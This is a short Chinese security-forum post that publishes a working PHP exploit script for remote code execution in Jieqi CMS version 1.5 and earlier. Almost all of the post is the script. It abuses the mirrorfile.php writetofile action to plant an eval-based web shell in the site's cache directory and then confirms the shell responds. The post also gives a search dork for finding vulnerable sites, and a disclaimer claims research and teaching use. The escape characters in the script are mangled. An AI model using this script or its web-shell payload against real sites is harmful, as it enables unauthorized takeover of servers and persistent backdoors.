作者:flyh4t
转个exp出来迎接新年
<?php print_r(' +---------------------------------------------------------------------------+ Jieqi cms <= 1.5 remote code execution exploit by Flyh4t mail: [email protected] team: http://www.wolvez.org dork: "技术支持:杰奇网络" +---------------------------------------------------------------------------+ '); /** * works regardless of php.ini settings */ if ($argc < 3) { print_r(' +---------------------------------------------------------------------------+ Usage: php '.$argv[0].' host path host: target server (ip/hostname) path: path to jieqi cms Example: php '.$argv[0].' localhost / +---------------------------------------------------------------------------+ '); exit; } error_reporting(7); ini_set('max_execution_time', 0); $host = $argv[1]; $path = $argv[2]; $url = 'http://'.$host.$path.'mirrorfile.php?filename=cache/flyh4t.php&action=writetofile&content='; $shell = 'http://'.$host.$path.'cache/flyh4t.php'; $cmd = urlencode("<?php @eval(/$_POST[wolvez]);?>test"); $str = file_get_contents($url.$cmd); if ( file_get_contents($shell) == 'test') exit("Expoilt Success!/nView Your shell:/t$shell/n"); else exit("Exploit Failed!/n"); ?>免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论